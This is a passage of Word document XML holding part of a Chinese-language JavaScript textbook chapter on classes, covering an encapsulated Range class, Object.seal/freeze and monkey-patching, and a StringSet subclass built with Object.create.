        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-21</w:t>
      </w:r>
      <w:r>
        <w:t>：将</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类的端点严格封装起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个版本的</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类是可变的，但将端点变量进行了良好的封装</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但端点的大小顺序还是固定的：</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Rang</w:t>
      </w:r>
      <w:r>
        <w:t>e(from,to){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>大于</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(from</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>to)throw new Error("Range:from must be</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=to");//</w:t>
      </w:r>
      <w:r>
        <w:t>定义存取器方法以维持不变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getFrom(){return from;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function getTo(){return to;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function setFrom(f){//</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>的值时，不允许</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>大于</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(f</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=to)from=f;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else throw new Error("Range:from must be</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=to");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function setTo(t){//</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>的值时，不允许</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(t</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=from)to=t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else throw new Error("Range:to must be</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=from");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将使用取值器的属性设置为可枚举的、不可配置的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperties(this,{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>from:{get:getFrom,set:setFrom,enumerable:true,configurable:false},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>to:{get:getTo,set</w:t>
      </w:r>
      <w:r>
        <w:t>:setTo,enumerable:true,configurable:false}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>和前面的例子相比，原型对象没有做任何修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>实例方法可以像读取普通的属性一样读取</w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.prototype=hideProps({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>constructor:Range,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>includes:function(x){return this.from</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=x</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:function(f){for(var x=Math.ceil(this.from);x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=this.to;x++)f(x);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){return"("+this.from+"..."+this.to+")";}</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52" w:name="9_8_4_Fang_Zhi_Lei_De_Kuo_Zhan_"/>
      <w:r>
        <w:t>9.8.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　防止类的扩展</w:t>
      </w:r>
      <w:bookmarkEnd w:id="252"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常认为，通过给原型对象添加方法可以动态地对类进行扩展，这是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>本身的特性。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>可以根据需要对此特性加以限制。</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>可以将对象设置为不可扩展的（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节），也就是说不能给对象添加任何新属性。</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>则更加强大，它除了能阻止用户给对象添加新属性，还能将当前已有的属性设置为不可配置的，这样就不能删除这些属性了</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（但不可配置的属性可以是可写的，也可以转换为只读属性）。可以通过这样一句简单的代码来阻止对</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prorotype</w:t>
      </w:r>
      <w:r>
        <w:t>的扩展：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.seal(Object.prototype);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt</w:t>
      </w:r>
      <w:r>
        <w:t>的另外一个动态特性是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法可以随时替换</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（或称为</w:t>
      </w:r>
      <w:r>
        <w:t>"monkey-patch"</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var original_sort_method=Array.prototype.sort;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.prototype.sort=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var start=new Date();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>original_sort_method.apply(this,arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var end=new Date();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("Array sort took"+(end-start)+"</w:t>
      </w:r>
      <w:r>
        <w:t>milliseconds.");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可以通过将实例方法设置为只读来防止这类修改，一种方法就是使用上面代码所定义的</w:t>
      </w:r>
      <w:r>
        <w:t>freezeProps()</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数。另外一种方法是使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>，它的功能和</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>完全一样，它同样会把所有属性都设置为只读的和不可配置的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>理解类的只读属性的特性至关重要。如果对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>继承了只读属性</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>，那么给</w:t>
      </w:r>
      <w:r>
        <w:t>o.p</w:t>
      </w:r>
      <w:r>
        <w:t>的赋值操作将会失败，就不会给</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>创建新属性。如果你想重写一个继承来的只读属性，就必须使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.definePro</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pertiy()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Obj</w:t>
      </w:r>
      <w:r>
        <w:t>ect.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>来创建这个新属性。也就是说，如果将类的实例方法设置为只读的，那么重写它的子类的这些方法的难度会更大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这种锁定原型对象的做法往往没有必要，但的确有一些场景是需要阻止对象的扩展的。回想一下例</w:t>
      </w:r>
      <w:r>
        <w:t>9-7</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>enumeration()</w:t>
      </w:r>
      <w:r>
        <w:t>，这是一个类工厂函数。这个函数将枚举类型的每个实例都保存在构造函数对象的属性里，以及构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:t>数组中。这些属性和数组是表示枚举类型实例的正式实例列表，是可以执行</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>冻结</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>freezing</w:t>
      </w:r>
      <w:r>
        <w:t>）操作的，这样</w:t>
      </w:r>
      <w:r>
        <w:t>就不能给它添加新的实例，已有的实例也无法删除或修改。可以给</w:t>
      </w:r>
      <w:r>
        <w:t>enumeration()</w:t>
      </w:r>
      <w:r>
        <w:t>函数添加几行简单的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.freeze(enumeration.values);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.freeze(enumeration);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，通过在枚举类型中调用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>，例</w:t>
      </w:r>
      <w:r>
        <w:t>9-17</w:t>
      </w:r>
      <w:r>
        <w:t>中定义的</w:t>
      </w:r>
      <w:r>
        <w:t>objectId</w:t>
      </w:r>
      <w:r>
        <w:t>属性之后也无法使用了。这个问题的解决办法是，在枚举类型被</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>冻结</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>之前读取一次它的</w:t>
      </w:r>
      <w:r>
        <w:t>objectId</w:t>
      </w:r>
      <w:r>
        <w:t>属性（调用潜在的存取器方法并设置内部属性）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="253" w:name="9_8_5_Zi_Lei_He_ECMAScript_5"/>
      <w:r>
        <w:t>9.8.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　子类和</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="253"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-22</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的特性实现子类。这里使用例</w:t>
      </w:r>
      <w:r>
        <w:t>9-16</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractWritableSet</w:t>
      </w:r>
      <w:r>
        <w:t>类来做进一步说明，来定义这个类的子类</w:t>
      </w:r>
      <w:r>
        <w:t>StringSet</w:t>
      </w:r>
      <w:r>
        <w:t>。下面这个例子的最大特点是使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>创建原型对象，这个原型对象继承自父类的原型，同时给新创建的对象定义属性。这种实现方法的困难之处在于，正如上文所提到的，它需要使用难看的属性描述符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个例子中另外一个有趣之处在于，使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>创建对象时传入了参数</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，这个创建的对象没有任何继承任何成员。这个对象用来存储集合的成员，同时，这个对象没有原型，这样我们就能对它直接使用</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[14]</w:t>
      </w:r>
      <w:r>
        <w:t>，而不须使用</w:t>
      </w:r>
      <w:r>
        <w:t>hasOwnProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-22</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>StringSet</w:t>
      </w:r>
      <w:r>
        <w:t>：利用</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的特性定义的子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function StringSet(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.set=Object.create(null);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个不包含原型的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.n=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>his.add.apply(this,arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，使用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>可以继承父类的原型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>而且可以定义单独调用的方法，因为我们没有指定属性的可写性、可枚举性和可配置性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此这些属性特性的默认值都是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>只读方法让这个类难于子类化（被继承）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>StringSet.prototype=Object.create(AbstractWritableSet.prototype,{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>constructor:{value:StringSet},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contains:{</w:t>
      </w:r>
      <w:r>
        <w:t>value:function(x){return x in this.set;}},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>size:{value:function(x){return this.n;}},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:{value:function(f,c){Object.keys(this.set).forEach(f,c);}},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>add:{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!(arguments[i]in this.set)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.set[a</w:t>
      </w:r>
      <w:r>
        <w:t>rguments[i]]=true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.n++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
